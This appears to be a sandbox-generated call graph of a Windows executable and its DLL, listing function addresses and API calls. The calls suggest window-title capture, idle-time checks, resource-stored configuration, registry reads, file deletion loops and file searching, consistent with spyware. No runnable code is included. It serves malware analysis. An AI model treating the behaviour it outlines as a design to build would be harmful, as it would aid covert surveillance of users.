53749 401ff1 53748->53749 53756 402039 53748->53756 53750 4023ce 11 API calls 53749->53750 53751 401ffa 53750->53751 53752 402015 53751->53752 53753 40203c 53751->53753 53771 403098 28 API calls 53752->53771 53754 40267a 11 API calls 53753->53754 53754->53756 53756->53641 53758 4020df 11 API calls 53757->53758 53768 404cde 53758->53768 53759 404e13 53760 401fd8 11 API calls 53759->53760 53761 404e1c 53760->53761 53761->53641 53762 4041a2 28 API calls 53762->53768 53763 401fe2 28 API calls 53763->53768 53764 401fd8 11 API calls 53764->53768 53766 4020f6 28 API calls 53766->53768 53768->53759 53768->53762 53768->53763 53768->53764 53768->53766 53772 401fc0 53768->53772 53769->53638 53770->53747 53771->53756 53773 401fd2 CreateEventA CreateThread WaitForSingleObject CloseHandle 53772->53773 53774 401fc9 53772->53774 53773->53768 53777 415b25 53773->53777 53776 4025e0 28 API calls 53774->53776 53776->53773 53778 4020f6 28 API calls 53777->53778 53779 415b47 SetEvent 53778->53779 53780 415b5c 53779->53780 53856 4041a2 53780->53856 53783 4020f6 28 API calls 53784 415b86 53783->53784 53785 4020f6 28 API calls 53784->53785 53786 415b98 53785->53786 53859 41beac 53786->53859 53789 415d11 53791 401e8d 11 API calls 53789->53791 53790 415bc1 GetTickCount 53881 41bc1f 53790->53881 53794 4170cd 53791->53794 53793 415d34 53922 4050e4 84 API calls 53793->53922 53797 401fd8 11 API calls 53794->53797 53800 4170d9 53797->53800 53799 415d04 53799->53789 53802 401fd8 11 API calls 53800->53802 53801 415bde 53804 41bc1f 28 API calls 53801->53804 53803 4170e5 53802->53803 53805 415be9 53804->53805 53887 41bb27 53805->53887 53810 401e65 22 API calls 53811 415c13 53810->53811 53812 402f31 28 API calls 53811->53812 53813 415c21 53812->53813 53896 402ea1 28 API calls 53813->53896 53815 415c30 53816 402f10 28 API calls 53815->53816 53817 415c3f 53816->53817 53897 402ea1 28 API calls 53817->53897 53819 415c4e 53820 402f10 28 API calls 53819->53820 53821 415c5a 53820->53821 53898 402ea1 28 API calls 53821->53898 53823 415c64 53824 404aa1 61 API calls 53823->53824 53825 415c73 53824->53825 53826 401fd8 11 API calls 53825->53826 53827 415c7c 53826->53827 53828 401fd8 11 API calls 53827->53828 53829 415c88 53828->53829 53830 401fd8 11 API calls 53829->53830 53831 415c94 53830->53831 53832 401fd8 11 API calls 53831->53832 53833 415ca0 53832->53833 53834 401fd8 11 API calls 53833->53834 53835 415cac 53834->53835 53836 401fd8 11 API calls 53835->53836 53837 415cb8 53836->53837 53899 401f09 53837->53899 53840 401fd8 11 API calls 53841 415cca 53840->53841 53842 401fd8 11 API calls 53841->53842 53843 415cd3 53842->53843 53844 401e65 22 API calls 53843->53844 53845 415cde 53844->53845 53902 43bb2c 53845->53902 53848 415cf0 53852 415d09 53848->53852 53853 415cfe 53848->53853 53849 415d16 53850 401e65 22 API calls 53849->53850 53851 415d20 53850->53851 53851->53789 53851->53793 53907 404f51 53852->53907 53906 404ff4 82 API calls 53853->53906 53923 40423a 53856->53923 53860 4020df 11 API calls 53859->53860 53880 41bebf 53860->53880 53861 41bf2f 53862 401fd8 11 API calls 53861->53862 53863 41bf61 53862->53863 53864 401fd8 11 API calls 53863->53864 53867 41bf69 53864->53867 53865 41bf31 53868 4041a2 28 API calls 53865->53868 53866 4041a2 28 API calls 53866->53880 53869 401fd8 11 API calls 53867->53869 53870 41bf3d 53868->53870 53873 415ba1 53869->53873 53871 401fe2 28 API calls 53870->53871 53874 41bf46 53871->53874 53872 401fe2 28 API calls 53872->53880 53873->53789 53873->53790 53873->53851 53875 401fd8 11 API calls 53874->53875 53877 41bf4e 53875->53877 53876 401fd8 11 API calls 53876->53880 53878 41cec5 28 API calls 53877->53878 53878->53861 53880->53861 53880->53865 53880->53866 53880->53872 53880->53876 53929 41cec5 53880->53929 53965 441ed1 53881->53965 53884 402093 28 API calls 53885 415bd2 53884->53885 53886 41bb77 GetLastInputInfo GetTickCount 53885->53886 53886->53801 53974 436f10 53887->53974 53892 41bdaf 53893 41bdbc 53892->53893 53894 4020b7 28 API calls 53893->53894 53895 415c05 53894->53895 53895->53810 53896->53815 53897->53819 53898->53823 53900 402252 11 API calls 53899->53900 53901 401f12 53900->53901 53901->53840 53903 43bb45 _strftime 53902->53903 54028 43ae83 53903->54028 53905 415ceb 53905->53848 53905->53849 53906->53799 53908 404f65 53907->53908 53909 404fea 53907->53909 53910 404f6e 53908->53910 53911 404fc0 CreateEventA CreateThread 53908->53911 53912 404f7d GetLocalTime 53908->53912 53909->53789 53910->53911 53911->53909 54099 405150 53911->54099 53913 41bc1f 28 API calls 53912->53913 53914 404f91 53913->53914 54098 4052fd 28 API calls 53914->54098 53922->53799 53924 404243 53923->53924 53925 4023ce 11 API calls 53924->53925 53926 40424e 53925->53926 53927 402569 28 API calls 53926->53927 53928 4041b5 53927->53928 53928->53783 53930 41ced2 53929->53930 53931 41cf31 53930->53931 53935 41cee2 53930->53935 53932 41cf4b 53931->53932 53933 41d071 28 API calls 53931->53933 53949 41d1d7 28 API calls 53932->53949 53933->53932 53936 41cf1a 53935->53936 53940 41d071 53935->53940 53948 41d1d7 28 API calls 53936->53948 53937 41cf2d 53937->53880 53942 41d079 53940->53942 53941 41d0ab 53941->53936 53942->53941 53943 41d0af 53942->53943 53946 41d093 53942->53946 53960 402725 22 API calls 53943->53960 53950 41d0e2 53946->53950 53948->53937 53949->53937 53951 41d0ec __EH_prolog 53950->53951 53961 402717 22 API calls 53951->53961 53953 41d0ff 53962 41d1ee 11 API calls 53953->53962 53955 41d125 53956 41d15d 53955->53956 53963 402730 11 API calls 53955->53963 53956->53941 53958 41d144 53964 402712 11 API calls std::_Deallocate 53958->53964 53961->53953 53962->53955 53963->53958 53964->53956 53966 441edd 53965->53966 53969 441ccd 53966->53969 53968 41bc43 53968->53884 53970 441ce4 53969->53970 53972 441d1b pre_c_initialization 53970->53972 53973 44062d 20 API calls _abort 53970->53973 53972->53968 53973->53972 53975 41bb46 GetForegroundWindow GetWindowTextW 53974->53975 53976 40417e 53975->53976 53977 404186 53976->53977 53982 402252 53977->53982 53979 404191 53986 4041bc 53979->53986 53983 40225c 53982->53983 53984 4022ac 53982->53984 53983->53984 53990 402779 11 API calls std::_Deallocate 53983->53990 53984->53979 53987 4041c8 53986->53987 53991 4041d9 53987->53991 53989 40419c 53989->53892 53990->53984 53992 4041e9 53991->53992 53993 404206 53992->53993 53994 4041ef 53992->53994 54008 4027e6 53993->54008 53998 404267 53994->53998 53997 404204 53997->53989 53999 402888 22 API calls 53998->53999 54000 40427b 53999->54000 54001 404290 54000->54001 54002 4042a5 54000->54002 54019 4042df 22 API calls 54001->54019 54003 4027e6 28 API calls 54002->54003 54007 4042a3 54003->54007 54005 404299 54020 402c48 22 API calls 54005->54020 54007->53997 54009 4027ef 54008->54009 54010 402851 54009->54010 54013 4027f9 54009->54013 54027 4028a4 22 API calls 54010->54027 54014 402802 54013->54014 54016 402815 54013->54016 54021 402aea 54014->54021 54017 402813 54016->54017 54018 402252 11 API calls 54016->54018 54017->53997 54018->54017 54019->54005 54020->54007 54022 402af4 __EH_prolog 54021->54022 54023 402e45 22 API calls 54022->54023 54025 402b60 54023->54025 54024 402252 11 API calls 54026 402bce 54024->54026 54025->54024 54026->54017 54044 43ba8a 54028->54044 54030 43aed0 54050 43a837 54030->54050 54032 43ae95 54032->54030 54033 43aeaa 54032->54033 54035 43aeaf pre_c_initialization 54032->54035 54049 44062d 20 API calls _abort 54033->54049 54035->53905 54037 43aedc 54038 43af0b 54037->54038 54058 43bacf 40 API calls __Toupper 54037->54058 54039 43af77 54038->54039 54059 43ba36 20 API calls 2 library calls 54038->54059 54060 43ba36 20 API calls 2 library calls 54039->54060 54042 43b03e _strftime 54042->54035 54061 44062d 20 API calls _abort 54042->54061 54045 43baa2 54044->54045 54046 43ba8f 54044->54046 54045->54032 54062 44062d 20 API calls _abort 54046->54062 54048 43ba94 pre_c_initialization 54048->54032 54049->54035 54051 43a854 54050->54051 54057 43a84a 54050->54057 54051->54057 54063 448295 GetLastError 54051->54063 54053 43a875 54084 4483e4 36 API calls __Getctype 54053->54084 54055 43a88e 54085 448411 36 API calls __cftoe 54055->54085 54057->54037 54058->54037 54059->54039 54060->54042 54061->54035 54062->54048 54064 4482b7 54063->54064 54065 4482ab 54063->54065 54087 445b74 20 API calls 3 library calls 54064->54087 54086 44883c 11 API calls 2 library calls 54065->54086 54068 4482b1 54068->54064 54070 448300 SetLastError 54068->54070 54069 4482c3 54071 4482cb 54069->54071 54094 448892 11 API calls 2 library calls 54069->54094 54070->54053 54088 446802 54071->54088 54073 4482e0 54073->54071 54076 4482e7 54073->54076 54075 4482d1 54077 44830c SetLastError 54075->54077 54095 448107 20 API calls _abort 54076->54095 54096 446175 36 API calls 4 library calls 54077->54096 54079 4482f2 54081 446802 _free 20 API calls 54079->54081 54083 4482f9 54081->54083 54082 448318 54083->54070 54083->54077 54084->54055 54085->54057 54086->54068 54087->54069 54089 44680d HeapFree 54088->54089 54093 446836 _free 54088->54093 54090 446822 54089->54090 54089->54093 54097 44062d 20 API calls _abort 54090->54097 54092 446828 GetLastError 54092->54093 54093->54075 54094->54073 54095->54079 54096->54082 54097->54092 54102 40515c 102 API calls 54099->54102 54101 405159 54102->54101 54103 44839e 54111 448790 54103->54111 54107 4483c7 54108 4483ba 54108->54107 54119 4483ca 11 API calls 54108->54119 54110 4483b2 54112 44854a _abort 5 API calls 54111->54112 54113 4487b7 54112->54113 54114 4487cf TlsAlloc 54113->54114 54115 4487c0 54113->54115 54114->54115 54116 43502b ___crtLCMapStringA 5 API calls 54115->54116 54117 4483a8 54116->54117 54117->54110 54118 448319 20 API calls 3 library calls 54117->54118 54118->54108 54119->54110 54120 100020db 54123 100020e7 ___scrt_is_nonwritable_in_current_image 54120->54123 54121 100020f6 54122 10002110 dllmain_raw 54122->54121 54124 1000212a 54122->54124 54123->54121 54123->54122 54128 1000210b 54123->54128 54133 10001eec 54124->54133 54126 10002177 54126->54121 54127 10001eec 29 API calls 54126->54127 54129 1000218a 54127->54129 54128->54121 54128->54126 54130 10001eec 29 API calls 54128->54130 54129->54121 54131 10002193 dllmain_raw 54129->54131 54132 1000216d dllmain_raw 54130->54132 54131->54121 54132->54126 54134 10001ef7 54133->54134 54135 10001f2a dllmain_crt_process_detach 54133->54135 54136 10001f1c dllmain_crt_process_attach 54134->54136 54137 10001efc 54134->54137 54142 10001f06 54135->54142 54136->54142 54138 10001f01 54137->54138 54139 10001f12 54137->54139 54138->54142 54143 1000240b 25 API calls 54138->54143 54144 100023ec 27 API calls 54139->54144 54142->54128 54143->54142 54144->54142 54145 434918 54146 434924 ___FrameUnwindToState 54145->54146 54172 434627 54146->54172 54148 43492b 54150 434954 54148->54150 54478 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 54148->54478 54157 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54150->54157 54183 4442d2 54150->54183 54154 434973 ___FrameUnwindToState 54161 4349f3 54157->54161 54479 443487 36 API calls 4 library calls 54157->54479 54191 434ba5 54161->54191 54173 434630 54172->54173 54484 434cb6 IsProcessorFeaturePresent 54173->54484 54175 43463c 54485 438fb1 54175->54485 54177 434641 54178 434645 54177->54178 54494 44415f 54177->54494 54178->54148 54181 43465c 54181->54148 54185 4442e9 54183->54185 54184 43502b ___crtLCMapStringA 5 API calls 54186 43496d 54184->54186 54185->54184 54186->54154 54187 444276 54186->54187 54188 4442a5 54187->54188 54189 43502b ___crtLCMapStringA 5 API calls 54188->54189 54190 4442ce 54189->54190 54190->54157 54192 436f10 ___scrt_get_show_window_mode 54191->54192 54193 434bb8 GetStartupInfoW 54192->54193 54194 4349f9 54193->54194 54195 444223 54194->54195 54544 44f0d9 54195->54544 54197 44422c 54199 434a02 54197->54199 54548 446895 36 API calls 54197->54548 54200 40ea00 54199->54200 54678 41cbe1 LoadLibraryA GetProcAddress 54200->54678 54202 40ea1c GetModuleFileNameW 54683 40f3fe 54202->54683 54204 40ea38 54205 4020f6 28 API calls 54204->54205 54206 40ea47 54205->54206 54207 4020f6 28 API calls 54206->54207 54208 40ea56 54207->54208 54209 41beac 28 API calls 54208->54209 54210 40ea5f 54209->54210 54698 40fb52 54210->54698 54212 40ea68 54213 401e8d 11 API calls 54212->54213 54214 40ea71 54213->54214 54215 40ea84 54214->54215 54216 40eace 54214->54216 54896 40fbee 118 API calls 54215->54896 54217 401e65 22 API calls 54216->54217 54219 40eade 54217->54219 54223 401e65 22 API calls 54219->54223 54220 40ea96 54221 401e65 22 API calls 54220->54221 54222 40eaa2 54221->54222 54897 410f72 36 API calls __EH_prolog 54222->54897 54224 40eafd 54223->54224 54225 40531e 28 API calls 54224->54225 54227 40eb0c 54225->54227 54229 406383 28 API calls 54227->54229 54228 40eab4 54898 40fb9f 78 API calls 54228->54898 54231 40eb18 54229->54231 54233 401fe2 28 API calls 54231->54233 54232 40eabd 54899 40f3eb 71 API calls 54232->54899 54235 40eb24 54233->54235 54236 401fd8 11 API calls 54235->54236 54237 40eb2d 54236->54237 54240 401fd8 11 API calls 54237->54240 54241 40eb36 54240->54241 54242 401e65 22 API calls 54241->54242 54243 40eb3f 54242->54243 54244 401fc0 28 API calls 54243->54244 54245 40eb4a 54244->54245 54246 401e65 22 API calls 54245->54246 54247 40eb63 54246->54247 54248 401e65 22 API calls 54247->54248 54249 40eb7e 54248->54249 54250 40ebe9 54249->54250 54900 406c59 54249->54900 54251 401e65 22 API calls 54250->54251 54257 40ebf6 54251->54257 54253 40ebab 54254 401fe2 28 API calls 54253->54254 54255 40ebb7 54254->54255 54256 401fd8 11 API calls 54255->54256 54259 40ebc0 54256->54259 54258 40ec3d 54257->54258 54262 413584 3 API calls 54257->54262 54702 40d0a4 54258->54702 54905 413584 RegOpenKeyExA 54259->54905 54269 40ec21 54262->54269 54268 40f38a 54998 4139e4 30 API calls 54268->54998 54269->54258 54908 4139e4 30 API calls 54269->54908 54277 40f3a0 54999 4124b0 65 API calls ___scrt_get_show_window_mode 54277->54999 54478->54148 54479->54161 54484->54175 54486 438fb6 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 54485->54486 54498 43a4ba 54486->54498 54489 438fc4 54489->54177 54491 438fcc 54492 438fd7 54491->54492 54512 43a4f6 DeleteCriticalSection 54491->54512 54492->54177 54540 44fbe8 54494->54540 54497 438fda 8 API calls 3 library calls 54497->54178 54499 43a4c3 54498->54499 54501 43a4ec 54499->54501 54503 438fc0 54499->54503 54513 438eff 54499->54513 54518 43a4f6 DeleteCriticalSection 54501->54518 54503->54489 54504 43a46c 54503->54504 54533 438e14 54504->54533 54506 43a476 54507 43a481 54506->54507 54538 438ec2 6 API calls try_get_function 54506->54538 54507->54491 54509 43a48f 54510 43a49c 54509->54510 54539 43a49f 6 API calls ___vcrt_FlsFree 54509->54539 54510->54491 54512->54489 54519 438cf3 54513->54519 54516 438f36 InitializeCriticalSectionAndSpinCount 54517 438f22 54516->54517 54517->54499 54518->54503 54520 438d27 54519->54520 54523 438d23 54519->54523 54520->54516 54520->54517 54521 438d47 54521->54520 54524 438d53 GetProcAddress 54521->54524 54523->54520 54523->54521 54526 438d93 54523->54526 54525 438d63 __crt_fast_encode_pointer 54524->54525 54525->54520 54527 438dbb LoadLibraryExW 54526->54527 54532 438db0 54526->54532 54528 438dd7 GetLastError 54527->54528 54529 438def 54527->54529 54528->54529 54530 438de2 LoadLibraryExW 54528->54530 54531 438e06 FreeLibrary 54529->54531 54529->54532 54530->54529 54531->54532 54532->54523 54534 438cf3 try_get_function 5 API calls 54533->54534 54535 438e2e 54534->54535 54536 438e46 TlsAlloc 54535->54536 54537 438e37 54535->54537 54537->54506 54538->54509 54539->54507 54543 44fc01 54540->54543 54541 43502b ___crtLCMapStringA 5 API calls 54542 43464e 54541->54542 54542->54181 54542->54497 54543->54541 54545 44f0eb 54544->54545 54546 44f0e2 54544->54546 54545->54197 54549 44efd8 54546->54549 54548->54197 54550 448295 FindHandlerForForeignException 36 API calls 54549->54550 54551 44efe5 54550->54551 54569 44f0f7 54551->54569 54553 44efed 54578 44ed6c 54553->54578 54556 44f004 54556->54545 54559 44f047 54562 446802 _free 20 API calls 54559->54562 54562->54556 54563 44f042 54602 44062d 20 API calls _abort 54563->54602 54565 44f08b 54565->54559 54603 44ec42 20 API calls 54565->54603 54566 44f05f 54566->54565 54567 446802 _free 20 API calls 54566->54567 54567->54565 54570 44f103 ___FrameUnwindToState 54569->54570 54571 448295 FindHandlerForForeignException 36 API calls 54570->54571 54572 44f10d 54571->54572 54575 44f191 ___FrameUnwindToState 54572->54575 54577 446802 _free 20 API calls 54572->54577 54604 446175 36 API calls 4 library calls 54572->54604 54605 445909 EnterCriticalSection 54572->54605 54606 44f188 LeaveCriticalSection std::_Lockit::~_Lockit 54572->54606 54575->54553 54577->54572 54579 43a837 __cftoe 36 API calls 54578->54579 54580 44ed7e 54579->54580 54581 44ed8d GetOEMCP 54580->54581 54582 44ed9f 54580->54582 54584 44edb6 54581->54584 54583 44eda4 GetACP 54582->54583 54582->54584 54583->54584 54584->54556 54585 4461b8 54584->54585 54586 4461f6 54585->54586 54587 4461c6 __Getctype 54585->54587 54608 44062d 20 API calls _abort 54586->54608 54587->54586 54588 4461e1 RtlAllocateHeap 54587->54588 54607 443001 7 API calls 2 library calls 54587->54607 54588->54587 54590 4461f4 54588->54590 54590->54559 54592 44f199 54590->54592 54593 44ed6c 38 API calls 54592->54593 54594 44f1b8 54593->54594 54597 44f209 IsValidCodePage 54594->54597 54599 44f1bf 54594->54599 54601 44f22e ___scrt_get_show_window_mode 54594->54601 54595 43502b ___crtLCMapStringA 5 API calls 54596 44f03a 54595->54596 54596->54563 54596->54566 54598 44f21b GetCPInfo 54597->54598 54597->54599 54598->54599 54598->54601 54599->54595 54609 44ee44 GetCPInfo 54601->54609 54602->54559 54603->54559 54604->54572 54605->54572 54606->54572 54607->54587 54608->54590 54610 44ef28 54609->54610 54611 44ee7e 54609->54611 54614 43502b ___crtLCMapStringA 5 API calls 54610->54614 54619 4511ac 54611->54619 54616 44efd4 54614->54616 54616->54599 54618 44aee6 _swprintf 41 API calls 54618->54610 54620 43a837 __cftoe 36 API calls 54619->54620 54621 4511cc MultiByteToWideChar 54620->54621 54623 45120a 54621->54623 54630 4512a2 54621->54630 54625 4461b8 ___crtLCMapStringA 21 API calls 54623->54625 54628 45122b __alloca_probe_16 ___scrt_get_show_window_mode 54623->54628 54624 43502b ___crtLCMapStringA 5 API calls 54626 44eedf 54624->54626 54625->54628 54633 44aee6 54626->54633 54627 45129c 54638 435ecd 20 API calls _free 54627->54638 54628->54627 54631 451270 MultiByteToWideChar 54628->54631 54630->54624 54631->54627 54632 45128c GetStringTypeW 54631->54632 54632->54627 54634 43a837 __cftoe 36 API calls 54633->54634 54635 44aef9 54634->54635 54639 44acc9 54635->54639 54638->54630 54640 44ace4 ___crtLCMapStringA 54639->54640 54641 44ad0a MultiByteToWideChar 54640->54641 54642 44ad34 54641->54642 54643 44aebe 54641->54643 54648 4461b8 ___crtLCMapStringA 21 API calls 54642->54648 54650 44ad55 __alloca_probe_16 54642->54650 54644 43502b ___crtLCMapStringA 5 API calls 54643->54644 54645 44aed1 54644->54645 54645->54618 54646 44ae0a 54675 435ecd 20 API calls _free 54646->54675 54647 44ad9e MultiByteToWideChar 54647->54646 54649 44adb7 54647->54649 54648->54650 54666 448c33 54649->54666 54650->54646 54650->54647 54654 44ade1 54654->54646 54657 448c33 _strftime 11 API calls 54654->54657 54655 44ae19 54656 4461b8 ___crtLCMapStringA 21 API calls 54655->54656 54660 44ae3a __alloca_probe_16 54655->54660 54656->54660 54657->54646 54658 44aeaf 54674 435ecd 20 API calls _free 54658->54674 54660->54658 54661 448c33 _strftime 11 API calls 54660->54661 54662 44ae8e 54661->54662 54662->54658 54663 44ae9d WideCharToMultiByte 54662->54663 54663->54658 54664 44aedd 54663->54664 54676 435ecd 20 API calls _free 54664->54676 54667 44854a _abort 5 API calls 54666->54667 54668 448c5a 54667->54668 54671 448c63 54668->54671 54677 448cbb 10 API calls 3 library calls 54668->54677 54670 448ca3 LCMapStringW 54670->54671 54672 43502b ___crtLCMapStringA 5 API calls 54671->54672 54673 448cb5 54672->54673 54673->54646 54673->54654 54673->54655 54674->54646 54675->54643 54676->54646 54677->54670 54679 41cc20 LoadLibraryA GetProcAddress 54678->54679 54680 41cc10 GetModuleHandleA GetProcAddress 54678->54680 54681 41cc49 44 API calls 54679->54681 54682 41cc39 LoadLibraryA GetProcAddress 54679->54682 54680->54679 54681->54202 54682->54681 55000 41b539 FindResourceA 54683->55000 54686 43bda0 new 21 API calls 54687 40f428 ctype 54686->54687 54688 4020b7 28 API calls 54687->54688 54689 40f443 54688->54689 54690 401fe2 28 API calls 54689->54690 54691 40f44e 54690->54691 54692 401fd8 11 API calls 54691->54692 54693 40f457 54692->54693 54694 43bda0 new 21 API calls 54693->54694 54695 40f468 ctype 54694->54695 55003 406e13 54695->55003 54697 40f49b 54697->54204 54699 40fb5e 54698->54699 54701 40fb65 54698->54701 55006 402163 11 API calls 54699->55006 54701->54212 55007 401fab 54702->55007 54896->54220 54897->54228 54898->54232 54901 4020df 11 API calls 54900->54901 54902 406c65 54901->54902 54903 4032a0 28 API calls 54902->54903 54904 406c82 54903->54904 54904->54253 54906 40ebdf 54905->54906 54907 4135ae RegQueryValueExA RegCloseKey 54905->54907 54906->54250 54906->54268 54907->54906 54908->54258 54998->54277 55001 41b556 LoadResource LockResource SizeofResource 55000->55001 55002 40f419 55000->55002 55001->55002 55002->54686 55004 4020b7 28 API calls 55003->55004 55005 406e27 55004->55005 55005->54697 55006->54701 55513 4129da 55514 4129ec 55513->55514 55515 4041a2 28 API calls 55514->55515 55516 4129ff 55515->55516 55517 4020f6 28 API calls 55516->55517 55518 412a0e 55517->55518 55519 4020f6 28 API calls 55518->55519 55520 412a1d 55519->55520 55521 41beac 28 API calls 55520->55521 55522 412a26 55521->55522 55523 412ace 55522->55523 55525 401e65 22 API calls 55522->55525 55524 401e8d 11 API calls 55523->55524 55526 412ad7 55524->55526 55527 412a3d 55525->55527 55528 401fd8 11 API calls 55526->55528 55529 4020f6 28 API calls 55527->55529 55530 412ae0 55528->55530 55531 412a48 55529->55531 55532 401fd8 11 API calls 55530->55532 55533 401e65 22 API calls 55531->55533 55534 412ae8 55532->55534 55535 412a53 55533->55535 55536 4020f6 28 API calls 55535->55536 55537 412a5e 55536->55537 55538 401e65 22 API calls 55537->55538 55539 412a69 55538->55539 55540 4020f6 28 API calls 55539->55540 55541 412a74 55540->55541 55542 401e65 22 API calls 55541->55542 55543 412a7f 55542->55543 55544 4020f6 28 API calls 55543->55544 55545 412a8a 55544->55545 55546 401e65 22 API calls 55545->55546 55547 412a95 55546->55547 55548 4020f6 28 API calls 55547->55548 55549 412aa0 55548->55549 55550 401e65 22 API calls 55549->55550 55551 412aae 55550->55551 55552 4020f6 28 API calls 55551->55552 55553 412ab9 55552->55553 55557 412aef GetModuleFileNameW 55553->55557 55558 4020df 11 API calls 55557->55558 55559 412b1a 55558->55559 55560 4020df 11 API calls 55559->55560 55561 412b26 55560->55561 55562 4020df 11 API calls 55561->55562 55567 412b32 55562->55567 55563 40da23 32 API calls 55563->55567 55564 401fd8 11 API calls 55564->55567 55565 41ba09 43 API calls 55565->55567 55566 4185a3 31 API calls 55566->55567 55567->55563 55567->55564 55567->55565 55567->55566 55568 412c58 Sleep 55567->55568 55569 40417e 28 API calls 55567->55569 55570 4042fc 84 API calls 55567->55570 55571 40431d 28 API calls 55567->55571 55572 412cfa Sleep 55567->55572 55573 403014 28 API calls 55567->55573 55574 412d9c Sleep 55567->55574 55575 41c516 32 API calls 55567->55575 55576 412dff DeleteFileW 55567->55576 55577 412e36 DeleteFileW 55567->55577 55578 412e88 Sleep 55567->55578 55579 412e72 DeleteFileW 55567->55579 55580 412f01 55567->55580 55586 412eff 55567->55586 55587 412ecd Sleep 55567->55587 55591 401f09 11 API calls 55567->55591 55568->55567 55569->55567 55570->55567 55571->55567 55572->55567 55573->55567 55574->55567 55575->55567 55576->55567 55577->55567 55578->55567 55579->55567 55581 401f09 11 API calls 55580->55581 55582 412f0d 55581->55582 55583 401f09 11 API calls 55582->55583 55584 412f19 55583->55584 55585 401f09 11 API calls 55584->55585 55585->55586 55588 40b93f 28 API calls 55586->55588 55589 401f09 11 API calls 55587->55589 55590 412f38 55588->55590 55589->55567 55592 4020f6 28 API calls 55590->55592 55591->55567 55593 412f58 55592->55593 55702 413268 55593->55702 55595 412f63 55596 401f09 11 API calls 55595->55596 55597 412f6f 55596->55597 55598 4130e3 55597->55598 55599 412f8f 55597->55599 55600 41bdaf 28 API calls 55598->55600 55601 41bdaf 28 API calls 55599->55601 55602 4130ec 55600->55602 55603 412f9b 55601->55603 55604 402f31 28 API calls 55602->55604 55605 41bc1f 28 API calls 55603->55605 55606 413123 55604->55606 55607 412fb5 55605->55607 55608 402f10 28 API calls 55606->55608 55609 402f31 28 API calls 55607->55609 55610 413132 55608->55610 55611 412fe5 55609->55611 55612 402f10 28 API calls 55610->55612 55613 402f10 28 API calls 55611->55613 55614 41313e 55612->55614 55615 412ff4 55613->55615 55616 402f10 28 API calls 55614->55616 55617 402f10 28 API calls 55615->55617 55618 41314d 55616->55618 55619 413003 55617->55619 55620 402f10 28 API calls 55618->55620 55621 402f10 28 API calls 55619->55621 55622 41315c 55620->55622 55623 413012 55621->55623 55624 402f10 28 API calls 55622->55624 55625 402f10 28 API calls 55623->55625 55627 41316b 55624->55627 55626 413021 55625->55626 55629 402f10 28 API calls 55626->55629 55628 402f10 28 API calls 55627->55628 55630 41317a 55628->55630 55631 41302d 55629->55631 55716 402ea1 28 API calls 55630->55716 55633 402f10 28 API calls 55631->55633 55635 413039 55633->55635 55634 413184 55636 404aa1 61 API calls 55634->55636 55714 402ea1 28 API calls 55635->55714 55638 413191 55636->55638 55640 401fd8 11 API calls 55638->55640 55639 413048 55641 402f10 28 API calls 55639->55641 55642 41319d 55640->55642 55643 413054 55641->55643 55644 401fd8 11 API calls 55642->55644 55715 402ea1 28 API calls 55643->55715 55646 4131a9 55644->55646 55648 401fd8 11 API calls 55646->55648 55647 41305e 55649 404aa1 61 API calls 55647->55649 55650 4131b5 55648->55650 55651 41306b 55649->55651 55652 401fd8 11 API calls 55650->55652 55653 401fd8 11 API calls 55651->55653 55654 4131c1 55652->55654 55655 413074 55653->55655 55656 401fd8 11 API calls 55654->55656 55657 401fd8 11 API calls 55655->55657 55659 4131ca 55656->55659 55658 41307d 55657->55658 55661 401fd8 11 API calls 55658->55661 55660 401fd8 11 API calls 55659->55660 55662 4131d3 55660->55662 55663 413086 55661->55663 55664 401fd8 11 API calls 55662->55664 55665 401fd8 11 API calls 55663->55665 55666 4130d7 55664->55666 55667 41308f 55665->55667 55669 401fd8 11 API calls 55666->55669 55668 401fd8 11 API calls 55667->55668 55670 41309b 55668->55670 55671 4131e5 55669->55671 55672 401fd8 11 API calls 55670->55672 55673 401f09 11 API calls 55671->55673 55674 4130a7 55672->55674 55675 4131f1 55673->55675 55676 401fd8 11 API calls 55674->55676 55677 401fd8 11 API calls 55675->55677 55678 4130b3 55676->55678 55679 4131fd 55677->55679 55680 401fd8 11 API calls 55678->55680 55681 401fd8 11 API calls 55679->55681 55682 4130bf 55680->55682 55683 413209 55681->55683 55684 401fd8 11 API calls 55682->55684 55685 401fd8 11 API calls 55683->55685 55686 4130cb 55684->55686 55687 413215 55685->55687 55688 401fd8 11 API calls 55686->55688 55689 401fd8 11 API calls 55687->55689 55688->55666 55690 413221 55689->55690 55691 401fd8 11 API calls 55690->55691 55692 41322d 55691->55692 55693 401fd8 11 API calls 55692->55693 55694 413239 55693->55694 55695 401fd8 11 API calls 55694->55695 55696 413245 55695->55696 55697 401fd8 11 API calls 55696->55697 55698 413251 55697->55698 55699 401fd8 11 API calls 55698->55699 55700 412abe 55699->55700 55701 404e26 99 API calls 55700->55701 55701->55523 55704 4132a6 55702->55704 55705 413277 55702->55705 55703 4132b5 55706 40417e 28 API calls 55703->55706 55704->55703 55717 10001c5b 55704->55717 55721 411d2d 55705->55721 55708 4132c1 55706->55708 55710 401fd8 11 API calls 55708->55710 55712 4132ca 55710->55712 55712->55595 55714->55639 55715->55647 55716->55634 55718 10001c6b ___scrt_fastfail 55717->55718 55725 100012ee 55718->55725 55720 10001c87 55720->55703 55767 411d39 55721->55767 55724 411fa2 22 API calls new 55724->55704 55726 10001324 ___scrt_fastfail 55725->55726 55727 100013b7 GetEnvironmentVariableW 55726->55727 55751 100010f1 55727->55751 55730 100010f1 51 API calls 55731 10001465 55730->55731 55732 100010f1 51 API calls 55731->55732 55733 10001479 55732->55733 55734 100010f1 51 API calls 55733->55734 55735 1000148d 55734->55735 55736 100010f1 51 API calls 55735->55736 55737 100014a1 55736->55737 55738 100010f1 51 API calls 55737->55738 55739 100014b5 lstrlenW 55738->55739 55740 100014d2 55739->55740 55741 100014d9 lstrlenW 55739->55741 55740->55720 55742 100010f1 51 API calls 55741->55742 55743 10001501 lstrlenW lstrcatW 55742->55743 55744 100010f1 51 API calls 55743->55744 55745 10001539 lstrlenW lstrcatW 55744->55745 55746 100010f1 51 API calls 55745->55746 55747 1000156b lstrlenW lstrcatW 55746->55747 55748 100010f1 51 API calls 55747->55748 55749 1000159d lstrlenW lstrcatW 55748->55749 55750 100010f1 51 API calls 55749->55750 55750->55740 55752 10001118 ___scrt_fastfail 55751->55752 55753 10001129 lstrlenW 55752->55753 55764 10002c40 55753->55764 55756 10001177 lstrlenW FindFirstFileW 